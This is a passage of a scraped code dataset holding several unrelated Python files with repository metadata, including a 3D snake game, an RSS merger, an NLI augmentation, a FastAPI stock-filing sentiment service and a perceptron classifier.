self.snake_parts = [Head()]\n self.bodyTypeList = [1,0,2,3,4]\n self.weirdLight = (1.0, 1.0, 1.0)\n obj = os.path.join(\"objects\",\"dummy.obj\")\n bodyOBJ1 = 
obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeBlack.png\"))\n bodyOBJ2 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeRed.png\"))\n bodyOBJ3 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeWhite.png\"))\n bodyOBJ4 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeOrange.png\"))\n bodyOBJ5 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeGreen.png\"))\n self.GPU1 = es.toGPUShape(bodyOBJ1, GL_REPEAT, GL_NEAREST)\n self.GPU2 = es.toGPUShape(bodyOBJ2, GL_REPEAT, GL_NEAREST)\n self.GPU3 = es.toGPUShape(bodyOBJ3, GL_REPEAT, GL_NEAREST)\n self.GPU4 = es.toGPUShape(bodyOBJ4, GL_REPEAT, GL_NEAREST)\n self.GPU5 = es.toGPUShape(bodyOBJ5, GL_REPEAT, GL_NEAREST)\n self.positions = deque([])\n self.initial_size = 5\n self.length = 5\n for i in range(self.initial_size-1):\n self.snake_parts.append(Body())\n\n for i in range(1,self.initial_size):\n self.snake_parts[i].x += -0.3*i\n for j in np.arange(self.snake_parts[i-1].x,self.snake_parts[i].x,-0.1):\n self.positions.appendleft((j,0,0))\n self.snake_parts[i].move()\n \n def lightChange(self):\n for part in self.snake_parts:\n part.weirdLight = self.weirdLight\n \n def draw(self, pipeline, projection, view):\n if not self.alive:\n return\n for i in range(len(self.snake_parts)):\n if self.bodyTypeList[i] % 5 == 0:\n self.snake_parts[i].draw(self.GPU1, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 1:\n self.snake_parts[i].draw(self.GPU2, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 2:\n self.snake_parts[i].draw(self.GPU3, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 3:\n self.snake_parts[i].draw(self.GPU4, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 4:\n self.snake_parts[i].draw(self.GPU5, pipeline, projection, view)\n\n\n def growth(self):\n new_part = Body()\n self.snake_parts.append(new_part)\n self.snake_parts[-1].x, self.snake_parts[-1].y, self.snake_parts[-1].theta = self.positions[(self.length-1)*-3]\n self.snake_parts[-1].move()\n roll = np.random.randint(0,4)\n self.bodyTypeList.append(roll)\n self.length += 1\n\n\n def collisions(self):\n x, y = self.snake_parts[0].x, self.snake_parts[0].y\n\n if (x-self.objective.x)**2 + (y-self.objective.y)**2 < 1.0:\n if self.objective.rare%5 == 0:\n self.floor.weirdTimer += 200\n self.objective.exists = False\n self.objective.rare += 1\n self.growth()\n\n if x**2 > 100 or y**2 > 100:\n self.alive = False\n\n for i in range(1,len(self.snake_parts)):\n if (x - self.snake_parts[i].x)**2 + (y - self.snake_parts[i].y)**2 < 0.09:\n self.alive = False\n\n\n def move(self):\n if not self.alive:\n return\n for i in range(1,self.length):\n self.snake_parts[i].x, self.snake_parts[i].y, self.snake_parts[i].theta = self.positions[i*-3]\n self.snake_parts[i].move()\n self.snake_parts[0].update()\n self.snake_parts[0].move()\n self.positions.append((self.snake_parts[0].x,self.snake_parts[0].y,self.snake_parts[0].theta))\n while len(self.positions) > self.length * 10:\n self.positions.popleft()\n \n ","repo_name":"Gonxolo/tarea2Snake3D","sub_path":"models/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11444123799","text":"import os\nimport codecs\n\n\ndef data_generator(dirname):\n \"\"\"Transforms all summaries in directory into data objects for pipeline.\n\n Simply iterates over the directory 
and calls file_to_data.\n \"\"\"\n for root, dirs, files in os.walk(dirname):\n for name in files:\n # Exclude hidden files\n if not name[0] == \".\":\n topic_id = name[0:-9]\n filename = os.path.join(root, name)\n yield file_to_data(filename, topic_id)\n\n\ndef file_to_data(filename, topic_id):\n \"\"\"Transforms a single summary file into a data object for pipeline.\"\"\"\n # open file\n review_sentences = []\n with codecs.open(filename, \"r\", encoding='utf-8', errors='ignore') as fh:\n review_sentences = fh.read().splitlines()\n\n # put sentences in list of dicts\n body = [{'type': 'p', 'content': p} for p in review_sentences]\n\n # Create dictionary of doc_id and body\n data = {'topic_id': topic_id, 'body': body, 'summaries': []}\n\n return data\n\n\ndef add_summaries(articles, dirname):\n \"\"\"Adds summaries from summary directory to the correct article object.\"\"\"\n all_summaries = {}\n for root, dirs, files in os.walk(dirname, topdown=True):\n for name in files:\n filename = os.path.join(root, name)\n # Cluster id is in the first 7 characters of the filename\n with open(filename, 'rb') as fh:\n summary = fh.read()\n # Add summary to right list (or initiate topic if not existing yet)\n topic_id = name[:-7]\n if topic_id in all_summaries:\n all_summaries[topic_id] += [summary]\n else:\n all_summaries[topic_id] = [summary]\n\n # Add list of summaries to corresponding article objects\n for article in articles:\n article['summaries'] = all_summaries[article['topic_id']]","repo_name":"blendle/research-summarization","sub_path":"data_extractors/opinosisprocessor.py","file_name":"opinosisprocessor.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"10691598992","text":"import random\n\nimport numpy as np\nimport pandas as pd\nfrom datasets import ClassLabel, Dataset\nfrom nltk.wsd import lesk\nfrom tqdm import tqdm\n\n\nclass swap_ant_augmentation:\n def __init__(self):\n pass\n\n def infer(self, dataset, n_workers=\"max\"):\n datacols = list(dataset.features.keys()) + [\"mapping\"]\n new_dataset = {k: [] for k in datacols}\n\n for i in tqdm(range(len(dataset))):\n if dataset[\"label\"][i] == 0:\n premise_tokens = dataset[\"premise\"][i].split()\n hypothesis_tokens = dataset[\"hypothesis\"][i].split()\n new_hyp = dataset[\"premise\"][i]\n flag = False\n for num, pr_token in enumerate(premise_tokens):\n best_sense = lesk(premise_tokens, pr_token)\n if best_sense is not None and (\n best_sense.pos() == \"s\" or best_sense.pos() == \"n\"\n ):\n for lemma in best_sense.lemmas():\n possible_antonyms = lemma.antonyms()\n for antonym in possible_antonyms:\n if \"_\" in antonym._name or antonym._name == \"civilian\":\n continue\n if pr_token not in hypothesis_tokens:\n continue\n new_hyp = new_hyp.replace(pr_token, antonym._name)\n flag = True\n\n if flag:\n new_dataset[\"hypothesis\"].append(new_hyp)\n new_dataset[\"premise\"].append(dataset[\"premise\"][i])\n new_dataset[\"label\"].append(2)\n new_dataset[\"mapping\"].append(i)\n for k in datacols:\n if k not in [\"premise\", \"hypothesis\", \"label\", \"mapping\"]:\n new_dataset[k].append(dataset[k][i])\n\n new_dataset = pd.DataFrame(new_dataset)\n return Dataset.from_pandas(new_dataset).cast_column(\"label\", 
dataset.features[\"label\"])\n","repo_name":"Maitreyapatel/reliability-checklist","sub_path":"reliability_checklist/augmentation/mnli/swap_ant.py","file_name":"swap_ant.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"74730839092","text":"import os\nfrom io import StringIO\nfrom typing import List, Union, Optional\nfrom xml.etree import ElementTree as et\n\nfrom xyw_eyes.rss.rss import RSS2\n\n\ndef merge_rss(name: str, files: Union[List[str], str], rss: Optional[RSS2] = None) -> None:\n \"\"\"\n 合并多个rss文件,可以通过传入RSS2对象自定义新rss文件的channel属性,没有传入时默认使用第一个文件的channel属性\n :param name: 新rss文件的保存地址\n :param files: 待合并rss文件的地址列表\n :param rss: 新rss文件的RSS2实例\n :return:\n \"\"\"\n rss_items = []\n if isinstance(files, str):\n files = [files]\n for file in files:\n if not os.path.isfile(file):\n raise ValueError('file \"{}\" does not exists'.format(file))\n rss_items.append(et.parse(file).findall('.//item'))\n if rss is not None:\n rss = et.parse(StringIO(rss.to_xml()))\n else:\n rss = et.parse(files[0])\n root = rss.getroot()\n channel = root.find('channel')\n for item in rss.findall('.//item'):\n channel.remove(item)\n items = [item for items in rss_items for item in items]\n root = rss.getroot()\n for item in items:\n root.find('channel').append(item)\n rss.write(name, encoding='utf-8', xml_declaration=True)\n\n\nif __name__ == '__main__':\n rss = RSS2(\n title='标题',\n link='https://www.douyu.com/',\n description='描述'\n )\n rss.set_build_time_now()\n merge_rss('douyu.xml', ['../../rss_spider/xml/douyu.xml', '../../rss_spider/xml/156xe.xml'], rss)\n","repo_name":"xue0228/rss","sub_path":"xyw_eyes/rss/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35119940913","text":"#!/usr/bin/env python3\nimport getopt\nimport sys\n#este programa se ejecuta de la siguiente manera:\n#python3 ejercicio2.py \"hola\" \"3\"\n\ndef main():\n text=sys.argv[1]\n x=int(sys.argv[2])\n\n list=text*(x)\n print(list)\n \n \n\nif __name__ == \"__main__\":\n main()\n \n\n \n","repo_name":"AugustoKark/Computacion2_AK2023","sub_path":"Ejercicios_Clases/Clase2/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"368393124","text":"\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--language\", dest=\"language\", type=str)\nparser.add_argument(\"--load-from\", dest=\"load_from\", type=str)\n#parser.add_argument(\"--save-to\", dest=\"save_to\", type=str)\nparser.add_argument(\"--gpu\", dest=\"gpu\", type=bool)\n\n\nimport random\n\nparser.add_argument(\"--batchSize\", type=int, default=64)\nparser.add_argument(\"--char_embedding_size\", type=int, default=100)\nparser.add_argument(\"--hidden_dim\", type=int, default=2048)\nparser.add_argument(\"--layer_num\", type=int, default=2)\nparser.add_argument(\"--weight_dropout_in\", type=float, default=0.3)\nparser.add_argument(\"--weight_dropout_hidden\", type=float, default=0.25)\nparser.add_argument(\"--char_dropout_prob\", type=float, default=0.05)\nparser.add_argument(\"--char_noise_prob\", type = float, default= 0.0)\nparser.add_argument(\"--learning_rate\", type = float, default= 0.4)\nparser.add_argument(\"--myID\", type=int, 
default=random.randint(0,1000000000))\nparser.add_argument(\"--sequence_length\", type=int, default=50)\n\n\nargs=parser.parse_args()\nprint(args)\n\n\ndef device(x):\n if args.gpu:\n return x.cuda()\n else:\n return x\n\n\n\nfrom acqdivReader import AcqdivReader, AcqdivReaderPartition\n\nacqdivCorpusReader = AcqdivReader(args.language)\n\n\n\ndef plus(it1, it2):\n for x in it1:\n yield x\n for x in it2:\n yield x\n\ntry:\n with open(\"/checkpoint/mhahn/char-vocab-acqdiv-\"+args.language, \"r\") as inFile:\n itos = inFile.read().strip().split(\"\\n\")\nexcept FileNotFoundError:\n print(\"Creating new vocab\")\n char_counts = {}\n # get symbol vocabulary\n with open(\"/private/home/mhahn/data/acqdiv/\"+args.language+\"-vocab.txt\", \"r\") as inFile:\n words = inFile.read().strip().split(\"\\n\")\n for word in words:\n for char in word.lower():\n char_counts[char] = char_counts.get(char, 0) + 1\n char_counts = [(x,y) for x, y in char_counts.items()]\n itos = [x for x,y in sorted(char_counts, key=lambda z:(z[0],-z[1]))]\n with open(\"/checkpoint/mhahn/char-vocab-acqdiv-\"+args.language, \"w\") as outFile:\n print(\"\\n\".join(itos), file=outFile)\n#itos = sorted(itos)\nitos.append(\"\\n\")\nitos.append(\" \")\nprint(itos)\nstoi = dict([(itos[i],i) for i in range(len(itos))])\n\nhalfSequenceLength = int(args.sequence_length/2)\n\n\n\nimport random\n\n\nimport torch\n\nprint(torch.__version__)\n\nfrom weight_drop import WeightDrop\n\n\nrnn = device(torch.nn.LSTM(args.char_embedding_size, args.hidden_dim, args.layer_num))\n\nrnn_parameter_names = [name for name, _ in rnn.named_parameters()]\nprint(rnn_parameter_names)\n\n\nrnn_drop = WeightDrop(rnn, [(name, args.weight_dropout_in) for name, _ in rnn.named_parameters() if name.startswith(\"weight_ih_\")] + [ (name, args.weight_dropout_hidden) for name, _ in rnn.named_parameters() if name.startswith(\"weight_hh_\")])\n\n# -1, because whitespace doesn't actually appear\noutput = device(torch.nn.Linear(args.hidden_dim, len(itos)-1+3))\nchar_embeddings = device(torch.nn.Embedding(num_embeddings=len(itos)-1+3, embedding_dim=args.char_embedding_size))\n\nlogsoftmax = torch.nn.LogSoftmax(dim=2)\n\ntrain_loss = torch.nn.NLLLoss(ignore_index=0)\nprint_loss = torch.nn.NLLLoss(size_average=False, reduce=False, ignore_index=0)\nchar_dropout = torch.nn.Dropout2d(p=args.char_dropout_prob)\n\nmodules = [rnn, output, char_embeddings]\ndef parameters():\n for module in modules:\n for param in module.parameters():\n yield param\n\nparameters_cached = [x for x in parameters()]\n\noptim = torch.optim.SGD(parameters(), lr=args.learning_rate, momentum=0.0) # 0.02, 0.9\n\nnamed_modules = {\"rnn\" : rnn, \"output\" : output, \"char_embeddings\" : char_embeddings, \"optim\" : optim}\n\nif args.load_from is not None:\n checkpoint = torch.load(\"/checkpoint/mhahn/\"+args.load_from+\".pth.tar\")\n for name, module in named_modules.items():\n module.load_state_dict(checkpoint[name])\n\nfrom torch.autograd import Variable\n\n# ([0] + [stoi[training_data[x]]+1 for x in range(b, b+sequence_length) if x < len(training_data)]) \n\n#from embed_regularize import embedded_dropout\n\n\ndef prepareDatasetChunks(data, train=True):\n numeric = [0]\n boundaries = [None for _ in range(args.sequence_length+1)]\n count = 0\n currentWord = \"\"\n print(\"Prepare chunks\")\n for chunk in data:\n print(len(chunk))\n for char in chunk:\n if char == \" \":\n boundaries[len(numeric)] = currentWord\n currentWord = \"\"\n continue\n count += 1\n currentWord += char\n# if count % 100000 == 0:\n# 
print(count/len(data))\n numeric.append((stoi[char]+3 if char in stoi else 2) if (not train) or random.random() > args.char_noise_prob else 2+random.randint(0, len(itos)))\n if len(numeric) > args.sequence_length:\n yield numeric, boundaries\n numeric = [0]\n boundaries = [None for _ in range(args.sequence_length+1)]\n\n\n# from each bath element, get one positive example OR one negative example\n\nwordsSoFar = set()\nhidden_states = []\nlabels = []\nlabels_sum = 0\n\ndef forward(numeric, train=True, printHere=False):\n global labels_sum\n numeric, boundaries = zip(*numeric)\n# print(numeric)\n # print(boundaries)\n\n input_tensor = Variable(device(torch.LongTensor(numeric).transpose(0,1)[:-1]), requires_grad=False)\n target_tensor = Variable(device(torch.LongTensor(numeric).transpose(0,1)[1:]), requires_grad=False)\n\n embedded = char_embeddings(input_tensor)\n if train:\n embedded = char_dropout(embedded)\n\n out, _ = rnn_drop(embedded, None)\n# if train:\n# out = dropout(out)\n\n for i in range(len(boundaries)):\n target = (labels_sum + 10 < len(labels)/2) or (random.random() < 0.5)\n #if :\n \n# print(boundaries[i])\n# print(target)\n# print(boundaries[i]) \n true = sum([((x == None) if target == False else (x not in wordsSoFar)) for x in boundaries[i][int(args.sequence_length/2):-1]])\n # print(target, true)\n if true == 0:\n continue\n soFar = 0\n for j in range(len(boundaries[i])):\n if j < int(len(boundaries[i])/2):\n continue\n if (lambda x:((x is None if target == False else x not in wordsSoFar)))(boundaries[i][j]):\n # print(i, target, true,soFar)\n if random.random() < 1/(true-soFar):\n hidden_states.append(out[j,i].detach().data.cpu().numpy())\n labels.append(1 if target else 0)\n labels_sum += labels[-1]\n if target:\n wordsSoFar.add(boundaries[i][j])\n break\n soFar += 1\n assert soFar < true\n# print(hidden_states)\n# print(labels)\n\n logits = output(out) \n log_probs = logsoftmax(logits)\n # print(logits)\n # print(log_probs)\n # print(target_tensor)\n\n loss = train_loss(log_probs.view(-1, len(itos)-1+3), target_tensor.view(-1))\n\n if printHere:\n lossTensor = print_loss(log_probs.view(-1, len(itos)-1+3), target_tensor.view(-1)).view(args.sequence_length, len(numeric))\n losses = lossTensor.data.cpu().numpy()\n# boundaries_index = [0 for _ in numeric]\n for i in range((args.sequence_length-1)-1):\n # if boundaries_index[0] < len(boundaries[0]) and i+1 == boundaries[0][boundaries_index[0]]:\n # boundary = True\n # boundaries_index[0] += 1\n # else:\n # boundary = False\n print((losses[i][0], itos[numeric[0][i+1]-3]))\n print((labels_sum, len(labels)))\n # return loss, len(numeric) * args.sequence_length\n\n\n\nimport time\n\ndevLosses = []\n#for epoch in range(10000):\nif True:\n\n \n data = AcqdivReaderPartition(acqdivCorpusReader, partition=\"train\").iterator(blankBeforeEOS=False)\n# data = data.reshuffledIterator(blankBeforeEOS=False, originalIterator=AcqdivReader.iteratorMorph)\n \n\n # training_data = corpusIteratorWiki.training(args.language)\n print(\"Got data\")\n training_chars = prepareDatasetChunks(data, train=True)\n\n\n\n rnn_drop.train(False)\n startTime = time.time()\n trainChars = 0\n counter = 0\n while True:\n counter += 1\n try:\n numeric = [next(training_chars) for _ in range(args.batchSize)]\n except StopIteration:\n break\n printHere = (counter % 50 == 0)\n forward(numeric, printHere=printHere, train=True)\n #backward(loss, printHere)\n if printHere:\n print((counter))\n print(\"Dev losses\")\n print(devLosses)\n print(\"Chars per sec 
\"+str(trainChars/(time.time()-startTime)))\n\n if len(labels) > 10000:\n break\n\npredictors = hidden_states\ndependent = labels\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(predictors, dependent, test_size=0.1, random_state=0, shuffle=True)\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nprint(\"regression\")\n\nlogisticRegr = LogisticRegression()\n\nlogisticRegr.fit(x_train, y_train)\n\npredictions = logisticRegr.predict(x_test)\n\n\nscore = logisticRegr.score(x_test, y_test)\nprint(\"Balance \",sum(y_test)/len(y_test))\nprint(score)\n\n\n\n\n\n\n# dev_data = corpusIteratorWiki.dev(args.language)\n# print(\"Got data\")\n# dev_chars = prepareDataset(dev_data, train=True) if args.language == \"italian\" else prepareDatasetChunks(dev_data, train=True)\n#\n#\n# \n# dev_loss = 0\n# dev_char_count = 0\n# counter = 0\n#\n# while True:\n# counter += 1\n# try:\n# numeric = [next(dev_chars) for _ in range(args.batchSize)]\n# except StopIteration:\n# break\n# printHere = (counter % 50 == 0)\n# loss, numberOfCharacters = forward(numeric, printHere=printHere, train=False)\n# dev_loss += numberOfCharacters * loss.cpu().data.numpy()[0]\n# dev_char_count += numberOfCharacters\n# devLosses.append(dev_loss/dev_char_count)\n# print(devLosses)\n# with open(\"/checkpoint/mhahn/\"+args.language+\"_\"+__file__+\"_\"+str(args.myID), \"w\") as outFile:\n# print(\" \".join([str(x) for x in devLosses]), file=outFile)\n#\n# if len(devLosses) > 1 and devLosses[-1] > devLosses[-2]:\n# break\n#\n","repo_name":"m-hahn/typology-char-lms","sub_path":"char-lm-acqdiv-classify-boundaries.py","file_name":"char-lm-acqdiv-classify-boundaries.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20071661270","text":"import argparse\nimport json\nimport re\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Union, List\n\nimport numpy as np\nfrom numpy.core.records import fromarrays # https://stackoverflow.com/questions/33212855/how-can-i-create-a-matlab-struct-array-from-scipy-io\nimport scipy.io\nfrom zmq import PROTOCOL_ERROR_ZMTP_MALFORMED_COMMAND_MESSAGE\nfrom multiconds import *\n\ndef create_rt_parametric_modulator_struct(reaction_time,posterror_masks,posterror_conditions):\n posterror_names = posterror_conditions['names']\n duration_array = None\n pmod_list = []\n # pmod_dict = {}\n # for k in ['name','param','poly']:\n # pmod_dict[k] = []\n \n for condition_i, condition_name in enumerate(posterror_names):\n condition_mask = posterror_masks[condition_i]\n #look up to see if we should include this regressor at all; it should\n if sum(condition_mask)>0:\n # print(str(condition_i) + \": \" + posterror_names[condition_i])\n # print(len(condition_mask))\n #condition_column = condition_mask*reaction_time\n #I'm unsure we should be mean-centering by condition here rather than across all reaction times, but it seems probably the right thing to do?\n condition_column = reaction_time[condition_mask]-np.mean(reaction_time[condition_mask])\n # print(condition_column)\n if condition_column is None:\n continue\n else:\n # print(\"duration_rray:\")\n # print(duration_array.shape)\n # print(condition_column.shape)\n #TO DO; SEE: https://stackoverflow.com/questions/19797822/creating-matlab-cell-arrays-in-python\n #THINK THAT IS THE SOLUTION.\n condition_column_npt = np.empty(1,dtype='O')\n condition_column_npt[0] = condition_column\n 
#condition_column_npt[0] ``= np.array([condition_column],dtype='O').T\n #condition_column_npt = np.array(np.array(condition_column).T,dtype=object)\n #rt_array = np.append(condition_column_npt, axis=1)\n\n #name_list = name_list + [posterror_names[condition_i]]\n # pmod_item = {\n # 'name':posterror_names[condition_i],\n # 'param':condition_column_npt,\n # 'poly':[]\n # }\n caps=re.findall(\"[A-Z]\",posterror_names[condition_i])\n abbreviation=\"\".join(caps).lower()\n abbreviation = abbreviation[0].upper() + abbreviation[1:]\n pmod_item = (\n abbreviation + \"RT\",\n condition_column_npt,\n [1.0]\n )\n # pmod_dict['name'] = pmod_dict['name'] + [posterror_names[condition_i]]\n # pmod_dict['param'] = pmod_dict['param'] + [condition_column]\n # pmod_dict['poly'] = pmod_dict['poly'] + [fromarrays([[]])]\n # pmod_item = [\n # posterror_names[condition_i],\n # condition_column_npt,\n # []\n # ]\n pmod_list = pmod_list + [pmod_item]\n else:\n #raise Exception(\"need to verify the next level is prepped to deal with some subjects having a missing regressor.\")\n warnings.warn(\n \"need to verify the next level is prepped to deal with some subjects having a missing regressor for condition \" + condition_name + \".\")\n\n if len(pmod_list)==0:\n return({}) #return nothing because there doesn't appear to be any params to pass\n #pmod_rec_array = fromarrays(pmod_list,names=['name','param','poly'])\n # testrec = fromarrays([['hi', 'hello'], [np.array(2),np.array(1)],[3,30.]], names=['name', 'param','poly'])\n # testrec = fromarrays([\n # ['hi', 'hello'], \n # [fromarrays([1,2]),fromarrays([1,2])]#,\n # #[fromarrays([[]]),fromarrays([[]])]\n # ], names=['name', 'param'])\n # scipy.io.savemat(\"testmat.mat\",{'var1':testrec})\n\n # testrec = fromarrays([\n # ['hi', 'hello'], \n # [([1,2]),fromarrays([1,2])]#,\n # #[fromarrays([[]]),fromarrays([[]])]\n # ], names=['name', 'param'])\n # scipy.io.savemat(\"testmat.mat\",{'var1':testrec})\n # x = np.array([('Rex', 9, [],[1,2,3]), ('Fido', 3, [],[10,20,30])],\n # dtype=[('name', '>>>>') #переделай\n#4189 К.Ю.Поляков\n'''\nАлгоритм вычисления значения функции F(n), где n – целое неотрицательное число,\nзадан следующими соотношениями:\n\nF(0) = 2\nF(n) = F(n–1), при 0 < n ≤ 15\nF(n) = 1,6*F(n–3), при 15 < n < 95\nF(n) = 3,3*F(n–2), при n ≥ 95\n\nКакая цифра встречается чаще всего в целой части значения функции F(33)? \n'''\n\ndef vol(n):\n if n == 0:\n return 2\n elif 0 < n <= 15:\n return vol(n-1)\n elif 15 < n < 95:\n return 1.6 * vol(n-3)\n elif n >= 95:\n return 3.3*vol(n-2)\nprint(vol(33))\nprint('Oтвет: 3')","repo_name":"ilyazheprog/EGE","sub_path":"Python/ЕГЭ2021/16/Решение заданий. 
Поляков/4189.py","file_name":"4189.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"32217490263","text":"#pylint: disable=c0305,c0301,c0116,c0103,c0303,w0511,r0914,w0613,w0612,r1705,w0703,c0114,c0325,c0410,c0413,e0401,c0411,w0611,e0102,r1721,c0121,w0621,w0622,e0012\nfrom enum import Enum\nfrom fastapi import FastAPI\nimport re\nimport os\nimport sys\nsys.path.insert(0,\"./\")\nimport edgar_downloader, edgar_cleaner\nimport joblib\nimport ref_data as edgar_refdata\nimport text_preprocessor\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pandas as pd\n\ndf_sp100 = edgar_refdata.get_sp100()\ntickers_dict = df_sp100['Symbol']\ninput_folder = r'C:\\temp\\junk\\10k_reports_raw'\n\napp=FastAPI()\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Edgar api\"}\n\n@app.get(\"/html/{ticker}/{year}\")\nasync def root(ticker: str, year:str):\n tickers_list=[]\n for i in tickers_dict:\n tickers_list.append(i)\n\n if (ticker not in tickers_list):\n return{\"Error\": \"ticker not recognised\"}\n\n if int(year)> 2021 or int(year)<2000:\n return {\"ERROR\":\"invalid year\"}\n fileName = \"file not found\"\n html_files = [f for f in os.listdir(input_folder)]\n in_file_path = False\n for i in html_files:\n if ticker in i and year in i:\n in_file_path = True\n fileName = i\n if in_file_path == False:\n edgar_downloader.download_files_10k(ticker, input_folder, year)\n html_files = [f for f in os.listdir(input_folder)]\n print('------------------------------')\n for i in html_files:\n if ticker in i and year in i:\n in_file_path = True\n fileName = i\n \n localUrl = fr'C:\\temp\\junk\\10k_reports_raw\\{fileName}'\n with open(localUrl, 'r') as file:\n fileContents = file.read()\n \n return{\"message\": fileContents}\n \n\n\n@app.get(\"/sentiment/{ticker}/{year}\")\nasync def root(ticker: str, year: str):\n for f in os.listdir('downloads'):\n os.remove(os.path.join('downloads', f))\n for f in os.listdir('downloads_cleaned'):\n os.remove(os.path.join('downloads_cleaned', f))\n # Get clean 10-k filing\n edgar_downloader.download_files_10k(ticker,'downloads',year)\n\n dir='downloads'\n\n for root, dirs, files in os.walk(dir):\n for name in files:\n if year not in name:\n os.remove(os.path.join(root, name))\n\n edgar_cleaner.write_clean_html_text_files('downloads','downloads_cleaned')\n\n for root, dirs, files in os.walk('downloads_cleaned'):\n for name in files:\n text = text_preprocessor.process_text_files(os.path.join(root,name))\n #return text\n \n #Load in model\n vectorizer = joblib.load('Tfidfvectorizer.joblib')\n text = vectorizer.transform([text])\n\n model = joblib.load('model.joblib')\n movement_proba = model.predict_proba(text)\n\n if movement_proba[0][1]<0.25:\n recommendation = 'SELL'\n\n elif movement_proba[0][1]>0.75:\n recommendation = 'BUY'\n\n else:\n recommendation = 'HOLD'\n \n return{f'{ticker},{year}': \n {\"P(stonk goes up)\":movement_proba[0][1],\n \"P(stonk goes down)\":1-movement_proba[0][1],\n \"recommendation\":recommendation\n }\n }\n \n\n@app.get(\"/txt/{ticker}/{year}\")\nasync def root(ticker: str, year: str):\n return{ticker: \"text file\" + \" \" + year}\n","repo_name":"magnusgilje/ce02_ice05_kubernetes","sub_path":"K8s-Edgar/k8s-aws-demo-iceberg-lion/edgar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"18816310987","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\n\nclass Perceptron(object):\n \"\"\"Perceptron classifier.\n\n Parameters\n -----------\n eta: float\n Learning rate(between 0 and 1.0)\n n_iter: int\n Loop time for learning process\n\n Attributes\n -----------\n w_: ld-array\n Weights after learning\n errors_: list\n Number of misclassifications in each epoch\n \"\"\"\n\n def __init__(self, eta=0.01, n_iter=10):\n self.eta = eta\n self.n_iter = n_iter\n self.w_ = []\n self.errors = []\n\n def fit(self, X, y):\n \"\"\"Fit training data\n :param X: Training data, shape = [n_samples, n_features]\n :param y: Target values, shape = [n_samples]\n :return: self\n \"\"\"\n self.w_ = np.zeros(X.shape[1] + 1)\n self.errors = np.zeros(self.n_iter)\n X = np.insert(X, 0, 1, 1) #Insert x0\n for i in range(self.n_iter):\n output = self.net_input(X)\n error = output - y\n update = self.eta * error\n self.w_ -= np.dot(X.T, update)\n self.errors[i] = np.dot(error, error) / 2\n return self\n\n def net_input(self, X):\n return np.dot(X, self.w_)\n\n def predict(self, X):\n X = np.insert(X, 0, 1, 1) # Insert x0\n return np.where(self.net_input(X) > 0, 1, -1)\n\n def normalize(self, X):\n X = (X-X.mean(0))/X.std(0)\n return X\n\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n markers = ('s', 'o', 'x', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n \n #plot class samples\n for idx, cl in enumerate(np.unique(y)):\n filter = (y.ravel() == cl)\n plt.scatter(x=X[filter, 0], y = X[filter, 1],\n alpha = 0.4, c = 'green',\n marker = 'o', label = cl)\n\nif __name__ == \"__main__\":\n df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None)\n y = df.iloc[0:100, 4].values\n y = np.where(y == 'Iris-setosa', -1, 1)\n X = df.iloc[0:100, [0, 2]].values\n Classifier = Perceptron(0.001, 100)\n X_std = Classifier.normalize(X)\n plt.scatter(X_std[:50, 0], X_std[:50, 1], color='red', marker='s', label='setosa')\n plt.scatter(X_std[50:100, 0], X_std[50:100, 1], color='blue', marker='x', label='versicolor')\n plt.legend(loc='upper left')\n Classifier.fit(X_std, y)\n Z = Classifier.predict(X_std)\n plot_decision_regions(X_std, y, classifier=Classifier)\n plt.show()\n plt.plot(Classifier.errors)\n plt.show()\n","repo_name":"shaotao1988/Python-Machine-Learning","sub_path":"Linear 